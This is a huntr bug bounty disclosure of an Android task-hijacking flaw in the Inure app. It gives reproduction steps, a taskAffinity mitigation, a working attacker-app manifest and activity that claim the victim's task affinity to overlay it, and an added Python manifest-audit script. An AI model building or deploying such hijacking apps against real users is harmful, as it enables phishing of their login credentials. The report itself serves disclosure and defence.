huntr M0ck3d 168E9299-F8FF-40D6-9DEF-D097B38BAD84
History: Aug 20, 2023 - 7:39 p.m.

Android Manifest Misconfiguration Leading to Task Hijacking

2023-08-20 19:39:00
m0ck3d
www.huntr.dev
59
task hijacking
malicious app
android 11
permissions
vulnerability
mitigation
manifest
attack code
bug bounty

EPSS

0.001

Percentile

49.2%

Description

Task hijacking allows a malicious app to inherit the permissions of a vulnerable app and is usually used to phish victims' login credentials.
This vulnerability applies to all Android versions before Android 11.

Steps To Reproduce:

  1. Victim installs the malicious app.
  2. Victim starts the malicious app (could also be a background service).
  3. Victim opens the legitimate app (Inure app), which the malicious app can intercept.

Video Proof of Concept

Video POC

Mitigation

To prevent this attack, set the taskAffinity property of the application's activities to an empty string (android:taskAffinity="") in the <activity> tag of AndroidManifest.xml to force the activities to use a randomly generated task affinity, or set it on the <application> tag to enforce it for all activities in the application.

Attacker App Code

Android Manifest

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="com.m0ck3d.taskhijackingattackapp"
    tools:ignore="ExtraText">

    <application
        android:allowBackup="true"
        android:icon="@drawable/daverage"
        android:label="AttackAppTaskHijacking"
        android:roundIcon="@drawable/daverage"
        android:supportsRtl="true"
        android:theme="@style/Theme.Taskhijackingattackapp"
        android:taskAffinity="app.simple.inure">
        <activity
            android:name=".MainActivity"
            android:launchMode="singleTask"
            android:excludeFromRecents="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>

</manifest>

Main Activity

import android.os.Bundle
import android.content.Intent
import androidx.appcompat.app.AppCompatActivity

class MainActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)

        // Move this activity's task to the background right after launch.
        moveTaskToBack(true)
    }

    override fun onResume() {
        super.onResume()
        // Show this app's layout whenever the activity returns to the foreground.
        setContentView(R.layout.activity_main)
    }
}
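
The Mitigation section and the attacker manifest above can be turned into a manifest check. The following is an added example, not part of the original report or of the Inure project: it reports every activity whose effective taskAffinity is not the empty string, and marks affinities that name a different package. It assumes a text-form AndroidManifest.xml (source or decoded); the function name, the issue labels and the com.example.notes sample are made up for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"

# Constructed sample: a victim-style manifest (package name is made up).
VICTIM = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.notes">
  <application>
    <activity android:name=".LoginActivity" android:taskAffinity="" />
    <activity android:name=".MainActivity" android:launchMode="singleTask" />
  </application>
</manifest>"""

# Abridged from the attacker manifest shown on this page.
ATTACKER = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.m0ck3d.taskhijackingattackapp">
  <application android:taskAffinity="app.simple.inure">
    <activity android:name=".MainActivity" android:launchMode="singleTask" />
  </application>
</manifest>"""

def audit_task_affinity(manifest_xml):
    """Return one finding per activity whose effective taskAffinity is not ""."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    app = root.find("application")
    if app is None:
        return []
    app_affinity = app.get(ANDROID + "taskAffinity")  # None when not declared
    findings = []
    for act in app.iter("activity"):
        affinity = act.get(ANDROID + "taskAffinity")
        if affinity is None:
            # Inherit from <application>, else fall back to the package name.
            affinity = app_affinity if app_affinity is not None else package
        if affinity == "":
            continue  # the mitigation described on this page is in place
        # An affinity naming another package is the pattern in the attacker manifest.
        foreign = affinity != package and not affinity.startswith(package + ".")
        findings.append({"activity": act.get(ANDROID + "name"), "affinity": affinity,
                         "launchMode": act.get(ANDROID + "launchMode", "standard"),
                         "issue": "foreign-affinity" if foreign else "mitigation-missing"})
    return findings

if __name__ == "__main__":
    for label, doc in (("victim", VICTIM), ("attacker", ATTACKER)):
        print(label, audit_task_affinity(doc))
```

The manifest inside a built APK is binary XML and has to be decoded to text before it can be passed to this function.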
